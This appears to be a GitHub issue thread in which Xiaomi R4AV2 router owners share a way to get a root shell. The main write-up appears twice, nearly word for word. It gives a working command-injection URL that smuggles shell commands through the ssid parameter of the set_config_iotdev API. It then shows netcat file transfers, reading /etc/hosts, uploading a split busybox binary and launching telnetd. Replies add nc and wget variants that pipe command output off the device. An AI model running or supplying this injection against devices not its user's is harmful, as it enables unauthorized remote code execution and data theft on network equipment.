This firmware has the speedtest exploit patched, but it still has the set_config_iotdev remote exec exploit:
In short, if you make a get request (open the link in the browser) to http://{{{ROUTER_IP}}}/cgi-bin/luci/;stok={{{STOK}}}/api/misystem/set_config_iotdev?bssid=XXXXXX&user_id=XXXXXX&ssid=-h%0A{{{URL_ENCODED_COMMAND}}}%0A , the command in {{{URL_ENCODED_COMMAND}}} gets executed.
By default, {{{ROUTER_IP}}} is 192.168.31.1 (default gateway in network settings of your PC connected to the router). {{{STOK}}} can be found in the URL by logging into the admin console of the router (http://192.168.31.1/cgi-bin/luci/;stok=STOK_WILL_BE_HERE/web/home#router). And, well, {{{URL_ENCODED_COMMAND}}} is the shell command that you want to execute in urlencoded format (https://www.urlencoder.io/)
You can verify the exploit by executing the reboot command: http://192.168.31.1/cgi-bin/luci/;stok={{{STOK}}}/api/misystem/set_config_iotdev?bssid=XXXXXX&user_id=XXXXXX&ssid=-h%0Areboot%0A - the router will reboot.
Unfortunately for us, Xiaomi removed dropbear (ssh) binaries in this firmware. And I couldn't make built-in telnet work.

NetCat saves the day

But! nc (netcat/ncat) works like a charm! Abusing that, we can transfer any files to or from the router (and thus we can upload working telnet/ssh/ftp/whatever binaries). ncat can be downloaded here https://nmap.org/download
To download a file from the router:
On your computer: run ncat -l 1234 > downloaded_file_name.txt
On your router: run nc {{{YOUR_PC_IP_ADDR}}} 1234 < /path/to/file_on_router' (via the exploit mentioned above)
You can test that by downloading /etc/hosts from the router.
You should replace {{{YOUR_PC_IP_ADDR}}} with a local IP of your computer (192.168.31.X)
To upload a file to the router:
On your computer: run ncat -l 1234 < file_to_upload_from_your_pc.txt
On your router: run nc {{{YOUR_PC_IP_ADDR}}} 1234 > /path/to/saved_file' (via the exploit mentioned above)
You can test it by uploading a small file from your PC to /tmp/file.txt, and then download it back via the method described above.
But! Here's a catch. From my testing, the router can only receive files up to 8Kb via nc. Our telnet/ssh binaries will surely be bigger than that. So, we need to split our binaries.

Splitting files

As I don't like splitting raw binaries, I decided to convert my binary to base64 first. You can do it here, by example: https://base64.guru/converter/encode/file
To split the resulting base64 file into pieces, run split -b 6K base64.txt on your computer (I decided to split into 6Kb pieces to be extra safe, more testing required)
The result of this command will be a folder full of files named xaa, xab, xac... I uploaded all of them to a separate folder on the router (/tmp/split), using the ncat method described above.
Then, I had to combine them back into a single file. To do that, run cat /tmp/split/x* > /tmp/split/final.txt on your router.
To decode a base64 encoded file into a binary, run base64 -d /tmp/split/final.txt > /tmp/split/final on your router.
To be extra sure that the file was not damaged, I decided to validate the md5 sum of the file by running md5sum /tmp/split/final on the router.
Then, make the file executable by running chmod +x /tmp/split/final on your router.
And finally, the file is ready to be executed.

Shell access

In my case, I uploaded a precompiled busybox binary with telnet supported.
I ran it /tmp/split/final telnetd on my router, and the telnet server was successfully launched.
Then, I connected to it by running telnet 192.168.31.1 on my PC.

Afterthoughts

To simplify the process of uploading multiple files to the router, I made a small Python script for batch uploads:
upl_file.py.zip
To use it, first, edit the script to configure your PC's IP addr and router's STOK. Then, make a /tmp/split folder by executing mkdir /tmp/split/ on the router. Create a new folder on your PC called split in the same folder where your script is, and put all xaa, xab, xac... files there. Install requests module for python3 if not already installed by running pip3 install requests --user on your PC. And finally, run the script by executing python3 upl_file.py on your PC
I also realized that I can explore the file system of the router by piping stdout/stderr of commands on the router to a file in /tmp, and then downloading the file to my PC via ncat. I also made a script for that, but as I figured out how to get telnet access, this doesn't seem relevant, so I will not be posting that.
Known working busybox binary: busybox.zip
For the lazy ones, here's an already split busybox binary: split_busybox.zip

Good job! I almost give up for this router. Nice Russia guy!

i launch telnet up, use your way。。 Nice Russia guy!👍👍👍

but telnet login fail..
root use password
, root, password all of this
fail fail....

this is the telnet output copy
XiaoQiang login: root
Password:
Login incorrect
XiaoQiang login:
Login timed out after 60 seconds

so what is your telnet root password , the words i wana

[ivan-semkin]

@chekn there is an updated version of the script at #155

If telnet is launched successfully then there should be no telnet password with the login root. Check out the pull request above

[LordPinhead]

I've broke 3 Routers with the script without problem, so please try it and give me a feedback. Maybe I have the time to reimplement the script a bit better, include the old attack, make it a bit more modular if they patch the backdoor one day and we have to use another approach.

[chekn]

@chekn there is an updated version of the script at #155

If telnet is launched successfully then there should be no telnet password with the login root. Check out the pull request above

tks, i have pass. now i can "drive car" every where
1、in the operate process, i direct python flask a httpserver, wget a new telnet
2、when i write openwrt success, i logined it, it is poor;
the wan is never through util i swith write this [PandoraBox_2990] and confiure the vlan
finally the wan is open， flow traffic normal, i relax。。

the route web:

[chekn]

I've broke 3 Routers with the script without problem, so please try it and give me a feedback. Maybe I have the time to reimplement the script a bit better, include the old attack, make it a bit more modular if they patch the backdoor one day and we have to use another approach.

tks

[Salpadding]

I managed to get shell access on this device without a chip programmer

The instructions are valid for macOS and GNU/Linux. I don't know how to pipe stuff from or to netcat on Windows.

Introduction

I am on R4AV2 firmware MiWiFi 稳定版 2.30.20

This firmware has the speedtest exploit patched, but it still has the set_config_iotdev remote exec exploit:

In short, if you make a get request (open the link in the browser) to http://{{{ROUTER_IP}}}/cgi-bin/luci/;stok={{{STOK}}}/api/misystem/set_config_iotdev?bssid=XXXXXX&user_id=XXXXXX&ssid=-h%0A{{{URL_ENCODED_COMMAND}}}%0A , the command in {{{URL_ENCODED_COMMAND}}} gets executed.

By default, {{{ROUTER_IP}}} is 192.168.31.1 (default gateway in network settings of your PC connected to the router). {{{STOK}}} can be found in the URL by logging into the admin console of the router (http://192.168.31.1/cgi-bin/luci/;stok=STOK_WILL_BE_HERE/web/home#router). And, well, {{{URL_ENCODED_COMMAND}}} is the shell command that you want to execute in urlencoded format (https://www.urlencoder.io/)

You can verify the exploit by executing the reboot command: http://192.168.31.1/cgi-bin/luci/;stok={{{STOK}}}/api/misystem/set_config_iotdev?bssid=XXXXXX&user_id=XXXXXX&ssid=-h%0Areboot%0A - the router will reboot.

Unfortunately for us, Xiaomi removed dropbear (ssh) binaries in this firmware. And I couldn't make built-in telnet work.

NetCat saves the day

But! nc (netcat/ncat) works like a charm! Abusing that, we can transfer any files to or from the router (and thus we can upload working telnet/ssh/ftp/whatever binaries). ncat can be downloaded here https://nmap.org/download

To download a file from the router: On your computer: run ncat -l 1234 > downloaded_file_name.txt On your router: run nc {{{YOUR_PC_IP_ADDR}}} 1234 < /path/to/file_on_router' (via the exploit mentioned above) You can test that by downloading /etc/hosts from the router.

You should replace {{{YOUR_PC_IP_ADDR}}} with a local IP of your computer (192.168.31.X)

To upload a file to the router: On your computer: run ncat -l 1234 < file_to_upload_from_your_pc.txt On your router: run nc {{{YOUR_PC_IP_ADDR}}} 1234 > /path/to/saved_file' (via the exploit mentioned above) You can test it by uploading a small file from your PC to /tmp/file.txt, and then download it back via the method described above.

But! Here's a catch. From my testing, the router can only receive files up to 8Kb via nc. Our telnet/ssh binaries will surely be bigger than that. So, we need to split our binaries.

Splitting files

As I don't like splitting raw binaries, I decided to convert my binary to base64 first. You can do it here, by example: https://base64.guru/converter/encode/file

To split the resulting base64 file into pieces, run split -b 6K base64.txt on your computer (I decided to split into 6Kb pieces to be extra safe, more testing required)

The result of this command will be a folder full of files named xaa, xab, xac... I uploaded all of them to a separate folder on the router (/tmp/split), using the ncat method described above.

Then, I had to combine them back into a single file. To do that, run cat /tmp/split/x* > /tmp/split/final.txt on your router.

To decode a base64 encoded file into a binary, run base64 -d /tmp/split/final.txt > /tmp/split/final on your router.

To be extra sure that the file was not damaged, I decided to validate the md5 sum of the file by running md5sum /tmp/split/final on the router.

Then, make the file executable by running chmod +x /tmp/split/final on your router.

And finally, the file is ready to be executed.

Shell access

In my case, I uploaded a precompiled busybox binary with telnet supported.

I ran it /tmp/split/final telnetd on my router, and the telnet server was successfully launched.

Then, I connected to it by running telnet 192.168.31.1 on my PC.

Afterthoughts

To simplify the process of uploading multiple files to the router, I made a small Python script for batch uploads: upl_file.py.zip

To use it, first, edit the script to configure your PC's IP addr and router's STOK. Then, make a /tmp/split folder by executing mkdir /tmp/split/ on the router. Create a new folder on your PC called split in the same folder where your script is, and put all xaa, xab, xac... files there. Install requests module for python3 if not already installed by running pip3 install requests --user on your PC. And finally, run the script by executing python3 upl_file.py on your PC

I also realized that I can explore the file system of the router by piping stdout/stderr of commands on the router to a file in /tmp, and then downloading the file to my PC via ncat. I also made a script for that, but as I figured out how to get telnet access, this doesn't seem relevant, so I will not be posting that.

Known working busybox binary: busybox.zip

For the lazy ones, here's an already split busybox binary: split_busybox.zip

thx
your upload script helped me a lot
i can execute commands and get output by 'nc -l 1234' and 'ls /tmp/* | nc my_pc 1234'
then i found wget command is available in my v2 router 'wget --help | nc my_pc 1234'
and upload busybox 'wget -O /tmp/busybox http://my_pc/busybox'
also 'md5sum /tmp/busybox | nc my_pc 1234'; 'chmod a+x /tmp/busybox && /tmp/busybox telnetd'
the root password could generate here: https://miwifi.gq/